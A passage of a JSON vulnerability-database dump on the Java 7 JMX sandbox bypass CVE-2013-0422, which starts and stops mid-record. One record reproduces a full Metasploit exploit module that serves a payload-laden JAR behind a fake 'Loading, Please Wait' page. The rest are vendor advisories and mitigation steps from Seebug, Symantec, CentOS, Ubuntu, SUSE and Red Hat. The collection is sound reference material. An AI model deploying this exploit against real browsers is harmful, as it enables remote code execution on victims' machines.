"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T16:50:42", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Java Applet JMX Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-77783", "id": "SSV:77783", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({ :javascript => false })\r\n\r\n\tdef initialize( info = {} )\r\n\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java Applet JMX Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module abuses the JMX classes from a Java Applet to run arbitrary Java\r\n\t\t\t\tcode outside of the sandbox as exploited in the wild in January of 2013. The\r\n\t\t\t\tvulnerability affects Java version 7u10 and earlier.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'egypt', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2013-0422' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '625617' ],\r\n\t\t\t\t\t[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\r\n\t\t\t\t\t[ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? I can't read Russian :-(\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => ['java'],\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Mac OS X x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 (Native Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 10 2013'\r\n\t\t))\r\n\tend\r\n\r\n\r\n\tdef setup\r\n\t\tpath = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")\r\n\t\t@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n\t\tpath = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")\r\n\t\t@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }\r\n\r\n\t\t@exploit_class_name = rand_text_alpha("Exploit".length)\r\n\t\t@exploit_class.gsub!("Exploit", @exploit_class_name)\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tprint_status("handling request for #{request.uri}")\r\n\r\n\t\tcase request.uri\r\n\t\twhen /\\.jar$/i\r\n\t\t\tjar = payload.encoded_jar\r\n\t\t\tjar.add_file("#{@exploit_class_name}.class", @exploit_class)\r\n\t\t\tjar.add_file("B.class", @loader_class)\r\n\t\t\tmetasploit_str = rand_text_alpha("metasploit".length)\r\n\t\t\tpayload_str = rand_text_alpha("payload".length)\r\n\t\t\tjar.entries.each { |entry|\r\n\t\t\t\tentry.name.gsub!("metasploit", metasploit_str)\r\n\t\t\t\tentry.name.gsub!("Payload", payload_str)\r\n\t\t\t\tentry.data = entry.data.gsub("metasploit", metasploit_str)\r\n\t\t\t\tentry.data = entry.data.gsub("Payload", payload_str)\r\n\t\t\t}\r\n\t\t\tjar.build_manifest\r\n\r\n\t\t\tsend_response(cli, jar, { 'Content-Type' => "application/octet-stream" })\r\n\t\twhen /\\/$/\r\n\t\t\tpayload = regenerate_payload(cli)\r\n\t\t\tif not payload\r\n\t\t\t\tprint_error("Failed to generate the payload.")\r\n\t\t\t\tsend_not_found(cli)\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\t\tsend_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n\t\telse\r\n\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef generate_html\r\n\t\thtml = %Q|<html><head><title>Loading, Please Wait...</title></head>|\r\n\t\thtml += %Q|<body><center><p>Loading, Please Wait...</p></center>|\r\n\t\thtml += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|\r\n\t\thtml += %Q|</applet></body></html>|\r\n\t\treturn html\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-77783"}, {"lastseen": "2017-11-19T17:47:04", "description": "BUGTRAQ ID: 57246\r\nCVE ID: CVE-2013-0422\r\n\r\nOracle Java Runtime Environment (JRE)\u662f\u4e00\u6b3e\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u8fd0\u884c\u73af\u5883\u7684\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nOracle JRE7\u73af\u5883\u4e2d\u7684jmx.mbeanserver.JmxMBeanServer\u7c7b\u5b58\u5728\u6c99\u76d2\u7ed5\u8fc7\u6f0f\u6d1e\u4f7f\u5f97\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u7ed5\u8fc7java securityManager\u7684\u68c0\u67e5\u8fdc\u7a0b\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n\u76ee\u524d\u5df2\u77e5\u53d7\u5f71\u54cd\u73af\u5883\u4e3a\u6700\u65b0\u7248\u672cOracle JRE7 update 10\u53ca\u5176\u66f4\u65e9\u7248\u672c\u3002\u7ecf\u6d4b\u8bd5Oracle Java 6\u4e0d\u53d7\u5f71\u54cd\u3002\n0\nOracle Java 7 Update 10\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0c\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u5728\u6d4f\u89c8\u5668\u4e2d\u6682\u65f6\u7981\u7528Java\r\n\r\n \u53c2\u8003\uff1ahttp://krebsonsecurity.com/how-to-unplug-java-from-the-browser/\r\n\r\n\u5bf9\u4e8eWindows\u7528\u6237:\r\n\r\n1) Firefox\r\n\r\n \u5de5\u5177->\u9644\u52a0\u7ec4\u4ef6(Ctrl-Shift-A)->\u63d2\u4ef6\uff0c\u5c06\u6240\u6709\u5e26\u6709Java\u5b57\u6837\u7684\u7981\u7528\uff0c\u91cd\u542fFirefox\u3002\r\n\r\n \u5b89\u88c5NoScript\u6269\u5c55\uff0cNoScript\u9009\u9879->\u5d4c\u5165\u7684\u5bf9\u8c61->\u7981\u6b62Java\r\n\r\n2) Chrome\r\n\r\n \u70b9\u51fb\u53f3\u4e0a\u89d2\u7684\u6273\u624b->\u8bbe\u7f6e->\u70b9\u51fb\u6700\u4e0b\u9762\u7684"\u663e\u793a\u9ad8\u7ea7\u8bbe\u7f6e"->\u9690\u79c1\u8bbe\u7f6e->\u5185\u5bb9\u8bbe\u7f6e->\u63d2\u4ef6\r\n ->\u505c\u7528\u5355\u4e2a\u63d2\u4ef6->Java->\u505c\u7528\r\n\r\n3) IE\r\n\r\n \u5982\u679c\u60a8\u5df2\u7ecf\u5347\u7ea7\u5230JRE 7 update 10\u53ef\u4ee5\u5229\u7528\u5b83\u65b0\u589e\u7684\u4e00\u4e2a\u5b89\u5168\u7279\u6027\u6765\u7981\u7528JAVA\u3002\r\n \u6253\u5f00\u63a7\u5236\u9762\u677f\uff0c\u641c\u7d22Java\uff0c\u5728java\u63a7\u5236\u9762\u677f\u4e2d\u9009\u62e9"\u5b89\u5168"\uff0c\u7136\u540e\u6e05\u7a7a"Enable Java\r\n content in the browser"\u7684\u590d\u9009\u6846\u3002\r\n http://www.java.com/en/download/help/disable_browser.xml\r\n\r\n \u5bf9\u4e8eJRE 7 update 10\u4ee5\u4e0b\u7684\u7248\u672c\uff1a\r\n\r\n \u63a7\u5236\u9762\u677f->Java->Java->\u67e5\u770b->\u7528\u6237->\u7981\u7528\u6240\u6709\u7248\u672c\u7684JRE(Java\u8fd0\u884c\u65f6\u73af\u5883)\r\n\r\n \u63a7\u5236\u9762\u677f->Java->Java->\u67e5\u770b->\u7cfb\u7edf->\u7981\u7528\u6240\u6709\u7248\u672c\u7684JRE(Java\u8fd0\u884c\u65f6\u73af\u5883)\r\n\r\n \u4f46\u662f\u8fd9\u4e00\u65b9\u6cd5\u53ea\u9002\u7528\u4e8eXP\u30012003\uff0c\u4e0d\u9002\u7528\u4e8eVista\u3001Win7\u7b49\u9ad8\u7248\u672c\u7684Windows\uff0c\u4f60\u65e0\u6cd5\u6e05\r\n \u7a7a\u76f8\u5e94\u7684\u542f\u7528\u590d\u9009\u6846\u3002\u6b64\u65f6\u9700\u8981\u4f7f\u7528regedit\u4fee\u6539\u6ce8\u518c\u8868\u3002\r\n\r\n \u8fd9\u4e2a\u6ce8\u518c\u8868\u952e\u503c\u4f4d\u4e8e:\r\n--------------------------------------------------------------------------\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\JavaSoft\\Java Plug-in]\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\JavaSoft\\Java Plug-in\\<\u7248\u672c\u53f7>]\r\n"UseJava2IExplorer"=dword:00000001\r\n--------------------------------------------------------------------------\r\n \u6240\u6709\u7248\u672c\u7684Java\u90fd\u6709\u4e00\u4e2aUseJava2IExplorer\uff0c\u5176\u503c\u7f3a\u7701\u4e3a1\uff0c\u4fee\u6539\u62100\u5373\u53ef\u7981\u7528Java\u3002\r\n\r\n\r\n \u5982\u679c\u662f64\u4f4d\u7cfb\u7edf\u4e5f\u5b89\u88c5\u4e8632\u4f4dJava\u7684\u8bdd\uff0c\u76f8\u5173\u6ce8\u518c\u8868\u952e\u503c\u4f4d\u4e8e:\r\n\r\n--------------------------------------------------------------------------\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Plug-in]\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Plug-in\\<\u7248\u672c\u53f7>]\r\n"UseJava2IExplorer"=dword:00000001\r\n--------------------------------------------------------------------------\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOracle\r\n------\r\nOracle\u5df2\u7ecf\u53d1\u5e03\u4e86\u9488\u5bf9\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01Java 7 update 11\u548c\u76f8\u5173\u5b89\u5168\u516c\u544a\uff1a\r\nhttp://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\r\n\r\n\u5efa\u8baeJava\u7528\u6237\u5c3d\u5feb\u5b89\u88c5\u6700\u65b0\u7684\u5347\u7ea7\u5305\u3002\r\n\r\n\u5bf9\u4e8eWindows \u7528\u6237\uff0c\u9996\u5148\u60a8\u5e94\u5f53\u5728\u63a7\u5236\u9762\u677f->\u6dfb\u52a0\u6216\u5220\u9664\u7a0b\u5e8f(Win7\u4e0b\u662f\u63a7\u5236\u9762\u677f->\u7a0b\u5e8f->\u7a0b\u5e8f\u548c\u529f\u80fd)\u4e2d\u786e\u8ba4\u60a8\u662f\u5426\u5df2\u7ecf\u5b89\u88c5java\uff0c\u4ee5\u53ca\u5b89\u88c5\u7684\u7248\u672c\uff0c\u4f8b\u5982\u662fJDK\u8fd8\u662fJRE\uff0c\u662f32\u4f4d\u8fd8\u662f64\u4f4d\u3002\u5982\u679c\u60a8\u5c1a\u672a\u5b89\u88c5Java,\u5219\u4e0d\u5fc5\u7ee7\u7eed\u4e0b\u9762\u7684\u64cd\u4f5c\u3002\r\n\r\n\u5bf9\u4e8ejava\u5f00\u53d1\u4eba\u5458\uff0c\u53ef\u4ee5\u4ece\u4e0b\u5217\u94fe\u63a5\u624b\u5de5\u4e0b\u8f7d\u6700\u65b0\u7684Java SE JDK 7\u548c JRE 7\uff1a\r\nhttp://www.oracle.com/technetwork/java/javase/downloads/index.html\r\n\r\n\u5bf9\u4e8e\u901a\u8fc7\u6d4f\u89c8\u5668\u4f7f\u7528Java SE\u7684\u666e\u901a\u7528\u6237\uff0c\u53ef\u4ee5\u76f4\u63a5\u8bbf\u95eehttp://java.com \uff0c\u6839\u636e\u63d0\u793a\u4fe1\u606f\u4e0b\u8f7d\u6700\u65b0\u7684java JRE\u3002\u5982\u679c\u60a8\u5728\u4f7f\u752864\u4f4dWindows\u7cfb\u7edf\uff0c\u60a8\u53ef\u80fd\u9700\u8981\u5206\u522b\u4f7f\u752832\u4f4d\u548c64\u4f4d\u7684\u6d4f\u89c8\u5668\u6765\u8bbf\u95eejava.com\u4ee5\u5206\u522b\u4e0b\u8f7d32\u4f4d\u548c64\u4f4d\u7684JRE\u3002", "published": "2013-01-14T00:00:00", "title": "Oracle Java 7 JmxMBeanServer\u7c7b\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60585", "id": "SSV:60585", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "symantec": [{"lastseen": "2018-03-13T06:16:58", "bulletinFamily": "software", "cvelist": ["CVE-2013-0422"], "description": "### Description\n\nOracle Java Runtime Environment is prone to multiple remote code execution vulnerabilities. An attacker can exploit these issues to execute arbitrary code in the context of the application. Versions prior to Oracle JRE 1.7.0 Update 11 are vulnerable.\n\n### Technologies Affected\n\n * CentOS CentOS 5 \n * Fedoraproject Fedora 16 \n * Fedoraproject Fedora 17 \n * Fedoraproject Fedora 18 \n * Gentoo Linux \n * IBM Java SDK 7 SR1 \n * IBM Java SDK 7 SR2 \n * IBM Java SDK 7 SR3 \n * IBM Java SE 7 SR1 \n * IBM Java SE 7 SR2 \n * IBM Maximo Asset Management 6.2 \n * IBM Maximo Asset Management 7.1 \n * IBM Maximo Asset Management 7.5 \n * IBM Maximo Asset Management Essentials 7.1 \n * IBM Maximo Asset Management Essentials 7.5 \n * IBM Tivoli Endpoint Manager for Remote Control 9.0.0 \n * IBM Tivoli System Automation for Integrated Operations Management 2.1 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JRE 1.7.0 Update 10 \n * Oracle JRE 1.7.0 Update 4 \n * Oracle JRE 1.7.0 Update 6 \n * Oracle JRE 1.7.0 Update 7 \n * Oracle JRE 1.7.0 Update 9 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Linux Enterprise Software Development Kit 11 SP2 \n * SuSE SUSE Linux Enterprise Java 11 SP2 \n * SuSE SUSE Linux Enterprise Server 11 SP2 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP2 \n * SuSE openSUSE 12.2 \n * Ubuntu Ubuntu Linux 12.10 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2013-01-10T00:00:00", "published": "2013-01-10T00:00:00", "id": "SMNTC-57246", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/57246", "type": "symantec", "title": "Oracle Java Runtime Environment CVE-2013-0422 Multiple Remote Code Execution Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:24:42", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0165\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection API\nin OpenJDK. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-January/031241.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-January/031242.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0165.html", "edition": 3, "modified": "2013-01-16T22:43:17", "published": "2013-01-16T20:29:20", "href": "http://lists.centos.org/pipermail/centos-announce/2013-January/031241.html", "id": "CESA-2013:0165", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:43:20", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "It was discovered that OpenJDK 7's security mechanism could be bypassed via \nJava applets. If a user were tricked into opening a malicious website, a \nremote attacker could exploit this to perform arbitrary code execution as \nthe user invoking the program.", "edition": 5, "modified": "2013-01-16T00:00:00", "published": "2013-01-16T00:00:00", "id": "USN-1693-1", "href": "https://ubuntu.com/security/notices/USN-1693-1", "title": "OpenJDK 7 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:15:22", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &gt; 32 bit shifts\n - G422525: Fix building with PaX enabled kernels.\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n * add openjdk-7-src-b147-awt-crasher.patch\n - turn pulseaudio off on pre 11.4 distros\n\n", "edition": 1, "modified": "2013-01-25T14:04:23", "published": "2013-01-25T14:04:23", "id": "OPENSUSE-SU-2013:0199-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html", "type": "suse", "title": "java-1_7_0-openjdk: update to icedtea-2.3.4 (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:25:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0426", "CVE-2012-1541", "CVE-2013-0427", "CVE-2013-1478", "CVE-2013-0428", "CVE-2013-1485", "CVE-2013-0435", "CVE-2013-0442", "CVE-2012-3342", "CVE-2013-0431", "CVE-2013-1473", "CVE-2013-0434", "CVE-2013-0443", "CVE-2012-3174", "CVE-2013-0351", "CVE-2013-0444", "CVE-2013-0433", "CVE-2013-1480", "CVE-2013-0409", "CVE-2013-0438", "CVE-2013-1486", "CVE-2013-1476", "CVE-2013-1487", "CVE-2013-0445", "CVE-2013-0432", "CVE-2013-0424", "CVE-2012-3213", "CVE-2013-0450", "CVE-2013-0446", "CVE-2013-0440", "CVE-2013-0437", "CVE-2013-0425", "CVE-2013-1484", "CVE-2013-0422", "CVE-2013-0441", "CVE-2013-0449", "CVE-2013-0423", "CVE-2013-0419"], "description": "IBM Java 7 was updated to SR4, fixing various critical\n security issues and bugs.\n\n Please see the IBM JDK Alert page for more information:\n\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Security issues fixed:\n\n CVE-2013-1487, CVE-2013-1486, CVE-2013-1478, CVE-2013-0445,\n CVE-2013-1480, CVE-2013-0441, CVE-2013-1476,\n CVE-2012-1541, CVE-2013-0446, CVE-2012-3342,\n CVE-2013-0442, CVE-2013-0450, CVE-2013-0425, CVE-2013-0426,\n CVE-2013-0428, CVE-2012-3213, CVE-2013-0419,\n CVE-2013-0423, CVE-2013-0351, CVE-2013-0432,\n CVE-2013-1473, CVE-2013-0435, CVE-2013-0434, CVE-2013-0409,\n CVE-2013-0427, CVE-2013-0433, CVE-2013-0424,\n CVE-2013-0440, CVE-2013-0438, CVE-2013-0443,\n CVE-2013-1484, CVE-2013-1485, CVE-2013-0437, CVE-2013-0444,\n CVE-2013-0449, CVE-2013-0431, CVE-2013-0422, CVE-2012-3174.\n\n", "edition": 1, "modified": "2013-03-13T00:05:30", "published": "2013-03-13T00:05:30", "id": "SUSE-SU-2013:0440-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00013.html", "title": "Security update for Java (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:53", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "These packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection API\nin OpenJDK. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:30", "published": "2013-01-16T05:00:00", "id": "RHSA-2013:0165", "href": "https://access.redhat.com/errata/RHSA-2013:0165", "type": "redhat", "title": "(RHSA-2013:0165) Important: java-1.7.0-openjdk security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Oracle Java SE version 7 includes the Oracle Java Runtime Environment and\nthe Oracle Java Software Development Kit.\n\nThis update fixes two vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Security Alert\npage, listed in the References section. (CVE-2012-3174, CVE-2013-0422)\n\nRed Hat is aware that a public exploit for CVE-2013-0422 is available that\nexecutes code without user interaction when a user visits a malicious web\npage using a browser with the Oracle Java 7 web browser plug-in enabled.\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 11 and resolve these issues.\nAll running instances of Oracle Java must be restarted for the update to\ntake effect.\n", "modified": "2018-06-07T09:04:15", "published": "2013-01-14T05:00:00", "id": "RHSA-2013:0156", "href": "https://access.redhat.com/errata/RHSA-2013:0156", "type": "redhat", "title": "(RHSA-2013:0156) Critical: java-1.7.0-oracle security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:21", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1541", "CVE-2012-3174", "CVE-2012-3213", "CVE-2012-3342", "CVE-2012-5085", "CVE-2013-0351", "CVE-2013-0409", "CVE-2013-0419", "CVE-2013-0422", "CVE-2013-0423", "CVE-2013-0424", "CVE-2013-0425", "CVE-2013-0426", "CVE-2013-0427", "CVE-2013-0428", "CVE-2013-0431", "CVE-2013-0432", "CVE-2013-0433", "CVE-2013-0434", "CVE-2013-0435", "CVE-2013-0437", "CVE-2013-0438", "CVE-2013-0440", "CVE-2013-0441", "CVE-2013-0442", "CVE-2013-0443", "CVE-2013-0444", "CVE-2013-0445", "CVE-2013-0446", "CVE-2013-0449", "CVE-2013-0450", "CVE-2013-0809", "CVE-2013-1473", "CVE-2013-1476", "CVE-2013-1478", "CVE-2013-1480", "CVE-2013-1484", "CVE-2013-1485", "CVE-2013-1486", "CVE-2013-1487", "CVE-2013-1493"], "description": "IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2012-1541, 